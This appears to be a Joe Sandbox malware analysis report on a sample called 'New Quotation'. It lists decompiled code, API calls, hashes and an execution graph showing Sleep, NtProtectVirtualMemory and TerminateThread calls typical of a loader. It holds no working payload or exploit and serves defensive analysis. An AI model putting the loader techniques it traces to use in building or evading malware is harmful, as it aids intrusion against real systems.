                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharPrevlstrlen
                                                                                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                                                                                          • API String ID: 2709904686-3370423016
                                                                                                                                                                                          • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                                                                                          • Instruction ID: d2786f61c86b799b8b6ecf14661ff9643eaf9d362a95097130d0805b1e4d2bc4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                                                                                          • Instruction Fuzzy Hash: 36D0A7B3410D20DAC3126718DC04DAF73ECFF6134074A442AF481A71A4D7785E8186ED
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405F92 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                                                                                                                                          0x00405fa2
                                                                                                                                                                                          0x00405fa4
                                                                                                                                                                                          0x00405fa7
                                                                                                                                                                                          0x00405fd3
                                                                                                                                                                                          0x00405fac
                                                                                                                                                                                          0x00405fb5
                                                                                                                                                                                          0x00405fba
                                                                                                                                                                                          0x00405fc5
                                                                                                                                                                                          0x00405fc8
                                                                                                                                                                                          0x00405fe4
                                                                                                                                                                                          0x00405fca
                                                                                                                                                                                          0x00405fd1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405fd1
                                                                                                                                                                                          0x00405fdd
                                                                                                                                                                                          0x00405fe1
                                                                                                                                                                                          0x00405fe1
                                                                                                                                                                                          0x00405fdb
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
                                                                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                                                                          • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                                          • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:0.1%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                          Signature Coverage:18.3%
                                                                                                                                                                                          Total number of Nodes:164
                                                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                                                          execution_graph 67380 1d809580 626 API calls 67381 1d857d80 820 API calls 67382 1d7cc170 657 API calls 67549 1d7d1f70 388 API calls 67550 1d7faf72 391 API calls 67551 1d7fa370 364 API calls 67552 1d809790 443 API calls 67553 1d855b90 617 API calls 67554 1d853f9f 13 API calls 67555 1d8043a0 390 API calls 67386 1d8589a0 16 API calls 67388 1d7db950 588 API calls 67391 1d7ee547 627 API calls 67392 1d8549b9 369 API calls 67393 1d7cc140 372 API calls 67564 1d808fbc 387 API calls 67565 1d7ca740 451 API calls 67567 1d80bbc0 586 API calls 67568 1d8087c0 363 API calls 67570 1d84ebc0 RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes 67398 1d80c5c6 616 API calls 67571 1d851fc9 652 API calls 67400 1d7ed530 363 API calls 67402 1d84d1d0 212 API calls 67575 1d876bde 634 API calls 67577 1d7cbf20 388 API calls 67403 1d8069e0 220 API calls 67371 1672b09 67372 1672c5f 67371->67372 67373 1672b31 67371->67373 67373->67372 67374 1672c2c NtProtectVirtualMemory 67373->67374 67582 1d7fcb10 GetPEB GetPEB GetPEB GetPEB 67583 1d7fc310 368 API calls 67375 1d8129f0 LdrInitializeThunk 67585 1d8567f0 369 API calls 67410 1d805900 367 API calls 67591 1d7c73f0 11 API calls 67421 1d85c51d 13 API calls 67423 1d7fe9e0 383 API calls 67425 1d808520 14 API calls 67593 1d80ab20 377 API calls 67594 1d80cb20 380 API calls 67366 1d812b20 67368 1d812b2a 67366->67368 67369 1d812b31 67368->67369 67370 1d812b3f LdrInitializeThunk 67368->67370 67426 1d81ad20 14 API calls 67598 1d808322 618 API calls 67429 1d84c920 370 API calls 67430 1d856920 LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 67431 1d801527 368 API calls 67600 1d7c9fd0 363 API calls 67601 1d7d3bd0 21 API calls 67602 1d84d729 380 API calls 67433 1d88d527 GetPEB LdrInitializeThunk 67434 1d80a130 14 API calls 67436 1d7c81c0 211 API calls 67606 1d7cbfc0 16 API calls 67607 1d7ce3c0 455 API calls 67437 1d7d1dc0 23 API calls 67438 1d7e51c0 414 API calls 67441 1d84cd40 363 API calls 67611 1d85174b 213 API calls 67444 1d808d4f 391 API calls 67445 1d7ce9ac 660 API calls 67613 1d80a350 455 API calls 67615 1d80bb5b 366 API calls 67447 1d7c7da0 RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes 67449 1d80415f 365 API calls 67450 1d807960 367 API calls 67453 1d7c8196 13 API calls 67454 1d80716d 12 API calls 67456 1d804d70 LdrInitializeThunk 67457 1d806d70 12 API calls 67460 1d855170 621 API calls 67620 1d857b70 835 API calls 67461 1672990 Sleep NtProtectVirtualMemory 67465 1d814880 LdrInitializeThunk RtlDebugPrintTimes 67468 1d80b890 411 API calls 67472 1d851490 619 API calls 67625 1d84d69d 364 API calls 67626 1672a7e NtProtectVirtualMemory 67627 1d852e9f 415 API calls 67473 1d7c7860 212 API calls 67474 1d7c7060 RtlDebugPrintTimes 67629 1d7cb260 383 API calls 67475 1d7d3c60 23 API calls 67630 1d80cea0 412 API calls 67632 1d8122a0 818 API calls 67476 1d855ca0 364 API calls 67477 1d8560a0 371 API calls 67478 1d7ec850 617 API calls 67479 1d8550b0 15 API calls 67635 1d7d3640 376 API calls 67636 1d7fea40 395 API calls 67480 1d806cc0 369 API calls 67637 1d8032c0 368 API calls 67486 1d7cb830 614 API calls 67640 1d7c7a30 383 API calls 67641 1d7d2e32 387 API calls 67489 1d84f0d0 211 API calls 67490 1d855cd0 362 API calls 67643 1d856ad0 LdrInitializeThunk LdrInitializeThunk 67355 1672a31 Sleep 67356 1672a79 NtProtectVirtualMemory 67355->67356 67358 1672af1 67356->67358 67491 1d7cb420 218 API calls 67644 1d7cb620 213 API calls 67492 1d7d2022 223 API calls 67494 1d8054e0 211 API calls 67362 1672806 67365 16613e3 67362->67365 67363 1672864 67364 16726f1 TerminateThread 67364->67365 67365->67363 67365->67364 67645 1d84f6e0 626 API calls 67646 1d7c821b 392 API calls 67496 1d850cee 14 API calls 67648 1d7c9610 618 API calls 67497 1d7d9810 623 API calls 67498 1d7d2410 667 API calls 67649 1d8096f0 369 API calls 67650 1d8062f0 671 API calls 67501 1d7c640d 621 API calls 67502 1d84ccf0 211 API calls 67503 1d7cec0b 657 API calls 67504 1d84f4fe 365 API calls 67651 1d7c6e00 RtlDebugPrintTimes RtlDebugPrintTimes 67653 1d7fd600 802 API calls 67508 1d7facf0 372 API calls 67509 1d7fccf0 GetPEB GetPEB 67511 1d812010 14 API calls 67658 16613e3 TerminateThread 67659 1d7c72e0 362 API calls 67512 1d7d58e0 912 API calls 67660 1d7d3ee2 23 API calls 67661 1d7f66e0 462 API calls 67664 1d84ea20 364 API calls 67517 1d7ff4d0 375 API calls 67518 1d800030 362 API calls 67665 1d806e30 14 API calls 67667 1d807a33 822 API calls 67520 1d7cb0c0 455 API calls 67669 1d80f240 368 API calls 67670 1d816e40 12 API calls 67525 1d856040 374 API calls 67526 1d850443 390 API calls 67672 1d7c82b0 364 API calls 67528 1d819450 13 API calls 67677 1d84de50 216 API calls 67678 1d84d250 365 API calls 67529 1d7ce0a4 391 API calls 67359 1672abe NtProtectVirtualMemory 67360 1672af1 67359->67360 67680 1d7cbea0 374 API calls 67530 1d7d00a0 625 API calls 67681 1d7d06a0 391 API calls 67686 1d85166e GetPEB GetPEB GetPEB 67534 1d7cc090 387 API calls 67687 1d7cfe90 19 API calls 67688 1d7ca290 582 API calls 67689 1d7dc690 GetPEB 67690 1d7ed690 14 API calls 67691 1d80ce70 388 API calls 67694 1d7fbe80 363 API calls

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 01672999 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52sleepCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49634876945.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1660000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                          • String ID: k!K
                                                                                                                                                                                          • API String ID: 3472027048-3744200736
                                                                                                                                                                                          • Opcode ID: 05a19de63410e948754dfb358ec6da175eff9477d42d67e036baf6449cb7a10a
                                                                                                                                                                                          • Instruction ID: 065f269b8a58c72930c1cf6e8001701fcc1bd713dacb8fe964067e3ae3ab5a2e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 05a19de63410e948754dfb358ec6da175eff9477d42d67e036baf6449cb7a10a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D1159B00543018FE751AF34CEDCB5B77A1EF143A5F12858CED918B1E6D364C9818B01
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 01672B09 Relevance: 1.6, APIs: 1, Instructions: 71nativeCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 83 1672b09-1672b2b 84 1672b31-1672b34 83->84 85 1672c5f-1672cc1 83->85 84->85 86 1672b3a-1672b9c call 1672936 call 1672cdf 84->86 86->85 93 1672ba2-1672ba5 86->93 93->85 94 1672bab-1672c59 NtProtectVirtualMemory 93->94
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 01672C34
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49634876945.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1660000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MemoryProtectVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2706961497-0
                                                                                                                                                                                          • Opcode ID: 7060a26a43030960d257671a684ede1a7c5874dabd67c254c9937fa42fff7f60
                                                                                                                                                                                          • Instruction ID: a19468a0584bed09e652b559ff218a3a08dc0f17187896039244cbd53b371edd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7060a26a43030960d257671a684ede1a7c5874dabd67c254c9937fa42fff7f60
                                                                                                                                                                                          • Instruction Fuzzy Hash: A611ABB05003014FCB04CF788EA1B833B6AFF266A4BA6056DED46DB1B6D720C486C635
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 01672B04 Relevance: 1.6, APIs: 1, Instructions: 61nativeCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 96 1672b04-1672b2b call 16680d0 99 1672b31-1672b34 96->99 100 1672c5f-1672cc1 96->100 99->100 101 1672b3a-1672b9c call 1672936 call 1672cdf 99->101 101->100 108 1672ba2-1672ba5 101->108 108->100 109 1672bab-1672c59 NtProtectVirtualMemory 108->109
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 01672C34
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49634876945.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1660000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MemoryProtectVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2706961497-0
                                                                                                                                                                                          • Opcode ID: 8e5921a8875f4f4ea7fae2121a3f214ecaf44b9845134a23aecfbdf3e0a28219
                                                                                                                                                                                          • Instruction ID: 683db60f062bf8131d7fdc8b706ec8cc724703f91b8086734b92de74611297a3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e5921a8875f4f4ea7fae2121a3f214ecaf44b9845134a23aecfbdf3e0a28219
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A115CB05003015FD714DE79CEE1B963F6AFF29260BA6069DE946CB1B6D720C4C1C635
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 01672A7E Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 111 1672a7e-1672af8 NtProtectVirtualMemory call 1672cdf 116 1672aff 111->116 116->116
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 01672AE9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49634876945.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1660000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MemoryProtectVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2706961497-0
                                                                                                                                                                                          • Opcode ID: a79fcdbb6a7cf420c49598a34b2d203cd53a88330e016487940df7e0bdd7cd74
                                                                                                                                                                                          • Instruction ID: 110ed7d9d130a5ef84a2cfca3a0294b24625376cab3c022d8d2110283de4222d
                                                                                                                                                                                          • Opcode Fuzzy Hash: a79fcdbb6a7cf420c49598a34b2d203cd53a88330e016487940df7e0bdd7cd74
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4FF01CB18453409FE7565E25CD4C75AB7A4FB203B5F118188E8918A1E5D3B88A808F92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 01672ABE Relevance: 1.5, APIs: 1, Instructions: 16nativeCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 117 1672abe-1672ae9 NtProtectVirtualMemory 118 1672af1-1672af8 117->118 119 1672aec call 1672cdf 117->119 120 1672aff 118->120 119->118 120->120
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 01672AE9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49634876945.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1660000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MemoryProtectVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2706961497-0
                                                                                                                                                                                          • Opcode ID: 40646715f683a94a7a920e03e4b96e2b2b1103224aef1cdfc67733be6cdecb56
                                                                                                                                                                                          • Instruction ID: 6793e7303bca29922d8cf6cbd2464129a2d5a176ce8704342c7566b899746b14
                                                                                                                                                                                          • Opcode Fuzzy Hash: 40646715f683a94a7a920e03e4b96e2b2b1103224aef1cdfc67733be6cdecb56
                                                                                                                                                                                          • Instruction Fuzzy Hash: BDE012B1D163C05FD3129F32492CB84BE98AF29798F2D04CDC0801E99FA171D5CD8296
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812DA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: c4ace3aa008d340adda655cc12c595c24e53f31e40dfe43e5c3d0b067f92329b
                                                                                                                                                                                          • Instruction ID: ae3beda3318574fd34a293ced12dcd3956de108ec55e64ea73d8a84d0c226628
                                                                                                                                                                                          • Opcode Fuzzy Hash: c4ace3aa008d340adda655cc12c595c24e53f31e40dfe43e5c3d0b067f92329b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8190022165100502D9017159450471A001A47D0241FD2C426F1014515ECA3D89D6F133
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812DC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: 5a7916e0ca2470af843b07d43a224b08d74866523d82c777acf135e41a40f398
                                                                                                                                                                                          • Instruction ID: 78e028db800674a80b56075fd6c3aab6cd2eb710131a457a1dc663b1868a7ba5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a7916e0ca2470af843b07d43a224b08d74866523d82c777acf135e41a40f398
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2090027125100402D9407159450474A001547D0301FD2C415F5054514EC66D8DD9B667
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: d88eb80e4b534413c3980b100a72e46d32decc73382c01e32b1c4275829593c8
                                                                                                                                                                                          • Instruction ID: e3ecd6c5dd03bf93acf82fd5af41466341e51f6459f4413ae697a6afcf1f70df
                                                                                                                                                                                          • Opcode Fuzzy Hash: d88eb80e4b534413c3980b100a72e46d32decc73382c01e32b1c4275829593c8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3990023125100413D9116159460470B001947D0241FD2C816F0414518DD66E8996F123
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: 429d54ac4b78780a53082765a52e02bb24d19d01dd5e0c7ca4879c846eb5a6f9
                                                                                                                                                                                          • Instruction ID: 87f26d18796808310a9b07275bb6a0d7d6706acc691d43bd3d1c44b1b9734a1a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 429d54ac4b78780a53082765a52e02bb24d19d01dd5e0c7ca4879c846eb5a6f9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 78900221292041525D45B159450460B401657E0241BD2C416F1404910CC53E989AE623
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 129 1d812c30-1d812c3c LdrInitializeThunk
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: 43854045b86155dfa6f01eeaf9a46ae16c842d28ca79da9251f31cd7c89aac1a
                                                                                                                                                                                          • Instruction ID: 07d4bb554f57c58432eb9cacaf1835984b05bcdd7ec3d40c57e779c822ca7146
                                                                                                                                                                                          • Opcode Fuzzy Hash: 43854045b86155dfa6f01eeaf9a46ae16c842d28ca79da9251f31cd7c89aac1a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8090022926300002D9807159550870E001547D1202FD2D819F0005518CC92D88ADA323
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812C50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 130 1d812c50-1d812c5c LdrInitializeThunk
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
